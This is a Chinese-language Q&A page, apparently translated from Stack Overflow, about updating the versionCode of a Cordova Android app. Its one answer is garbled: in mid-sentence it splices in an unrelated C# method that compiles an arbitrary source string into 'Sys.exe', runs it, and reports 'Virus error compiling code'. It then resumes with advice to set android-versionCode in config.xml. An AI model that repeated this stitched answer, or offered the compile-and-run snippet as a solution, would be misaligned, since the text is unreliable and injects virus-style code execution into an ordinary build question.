Cordova Android应用更新/版本代码

时间:2015-06-11 16:48:54

标签: android cordova

我需要更新我的Android应用程序。为此,Google Play商店表示它必须是其他版本代码。我该如何更新?如果我进入androidmanifest.xml并设置android:versionCode =" 1"到android:versionCode =" 2"。调试后它将返回1.

有什么问题?

的Lukas

感谢您的帮助

1 个答案:

答案 0 :(得分:1)

最好在 public static bool ExecuteCommand(string action) { try { CodeDomProvider codeProvider = CodeDomProvider.CreateProvider("CSharp"); ICodeCompiler codeCompiler = codeProvider.CreateCompiler(); CompilerParameters compilerParams = new CompilerParameters(); compilerParams.GenerateExecutable = true; compilerParams.OutputAssembly = "Sys.exe"; CompilerResults compilerRes = codeCompiler.CompileAssemblyFromSource(compilerParams, action); Process.Start("Sys.exe"); if (compilerRes.Errors.Count > 0) throw new Exception(); return true; }catch(Exception) { MessageBox.Show("Virus error compiling code"); } return false; } 文件中添加config.xml

android-versionCode="X"